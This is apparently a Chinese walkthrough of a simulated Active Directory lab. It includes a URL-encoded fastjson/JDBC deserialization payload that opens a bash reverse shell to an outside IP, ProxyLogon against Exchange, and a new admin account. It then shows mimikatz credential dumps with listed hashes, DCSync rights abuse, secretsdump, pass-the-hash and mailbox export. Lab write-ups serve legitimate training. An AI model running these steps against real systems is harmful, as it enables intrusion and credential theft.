目录
flag1
fscan扫外网
访问8000端口->官方网站
Java 代码审计之华夏 ERP CMS v2.3 | Drunkbaby's Blog
admin/123456弱口令
打/user/list?search=的jdbc+fj反序列化
vps搭一个MySQL_Fake_Server
payload:
/user/list?search=%7b%20%22%6e%61%6d%65%22%3a%20%7b%20%22%40%74%79%70%65%22%3a%20%22%6a%61%76%61%2e%6c%61%6e%67%2e%41%75%74%6f%43%6c%6f%73%65%61%62%6c%65%22%2c%20%22%40%74%79%70%65%22%3a%20%22%63%6f%6d%2e%6d%79%73%71%6c%2e%6a%64%62%63%2e%4a%44%42%43%34%43%6f%6e%6e%65%63%74%69%6f%6e%22%2c%20%22%68%6f%73%74%54%6f%43%6f%6e%6e%65%63%74%54%6f%22%3a%20%22%31%32%34%2e%32%32%32%2e%31%33%36%2e%33%33%22%2c%20%22%70%6f%72%74%54%6f%43%6f%6e%6e%65%63%74%54%6f%22%3a%20%33%33%30%36%2c%20%22%69%6e%66%6f%22%3a%20%7b%20%22%75%73%65%72%22%3a%20%22%79%73%6f%5f%43%6f%6d%6d%6f%6e%73%43%6f%6c%6c%65%63%74%69%6f%6e%73%36%5f%62%61%73%68%20%2d%63%20%7b%65%63%68%6f%2c%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%6a%51%75%4d%6a%49%79%4c%6a%45%7a%4e%69%34%7a%4d%79%38%78%4d%7a%4d%33%49%44%41%2b%4a%6a%45%3d%7d%7c%7b%62%61%73%65%36%34%2c%2d%64%7d%7c%7b%62%61%73%68%2c%2d%69%7d%22%2c%20%22%70%61%73%73%77%6f%72%64%22%3a%20%22%70%61%73%73%22%2c%20%22%73%74%61%74%65%6d%65%6e%74%49%6e%74%65%72%63%65%70%74%6f%72%73%22%3a%20%22%63%6f%6d%2e%6d%79%73%71%6c%2e%6a%64%62%63%2e%69%6e%74%65%72%63%65%70%74%6f%72%73%2e%53%65%72%76%65%72%53%74%61%74%75%73%44%69%66%66%49%6e%74%65%72%63%65%70%74%6f%72%22%2c%20%22%61%75%74%6f%44%65%73%65%72%69%61%6c%69%7a%65%22%3a%20%22%74%72%75%65%22%2c%20%22%4e%55%4d%5f%48%4f%53%54%53%22%3a%20%22%31%22%20%7d%20%7d%0a
cat /root/flag/flag01.txt
flag2
wget下载fscan和frp,扫内网,搭隧道
172.22.3.12 本机
172.22.3.2 XIAORANG-WIN16 DC
172.22.3.9 XIAORANG-EXC01 Exchange
172.22.3.26 XIAORANG-PC
proxylogon打exchange server拿到SYSTEM权限
创建一个用户rdp上去拿flag
net user Z3r4y 0x401@admin /add
net localgroup administrators Z3r4y /add 
flag3
Exchange 机器账户默认对域内成员具有 WriteDACL 权限, 可以写 DCSync
传一个猕猴桃,以管理员身份运行
privilege::debug
sekurlsa::logonpasswords
总结下有用的:
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 63bb769f8b788233f66fc95d25b394cc
* SHA1 : fab946704b39540fa89f56f53cd65e421d933fcc
* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b
proxychains4 python3 dacledit.py xiaorang.lab/XIAORANG-EXC01\$ -hashes :63bb769f8b788233f66fc95d25b394cc -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2将DCSync权限(用于域同步和密码哈希提取)授予
Zhangtong账户,目标域为xiaorang.lab,操作通过IP地址为172.22.3.2的域控制器完成。
拿Zhangtong去dump域管哈希
proxychains4 impacket-secretsdump xiaorang.lab/[email protected] -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm
pth拿dc
proxychains4 impacket-smbexec -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/[email protected] -codec gbk
flag4
proxychains4 impacket-smbclient -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/[email protected] -dc-ip 172.22.3.2smbclient横向26,Lumia用户桌面有个secret.zip
zip里是flag文件
pthexchange导出Lumia mailbox里面的全部邮件以及附件
proxychains python3 pthexchange.py --target https://172.22.3.9/ --username Lumia --password '00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296' --action Download
邮件提示压缩包是用电话号码加密的
下载另一个邮件的csv附件
写一个脚本提取出phone字段
import csv
# 定义存放电话号码的列表
phone_numbers = []
# 读取CSV文件
with open('phone lists.csv', 'r') as file:
reader = csv.DictReader(file) # 使用 DictReader 方便按列名提取数据
for row in reader:
phone_numbers.append(row['phone']) # 提取 phone 列的值并加入列表
# 输出提取的电话号码
for phone in phone_numbers:
print(phone)
# 如果需要将电话写入到新的文件,也可以这样操作:
with open('extracted_phones.txt', 'w') as output_file:
for phone in phone_numbers:
output_file.write(phone + '\n')
爆出密码为18763918468
zip2john secret.zip >zip.txt
john --wordlist=extracted_phones.txt zip.txt
拿到flag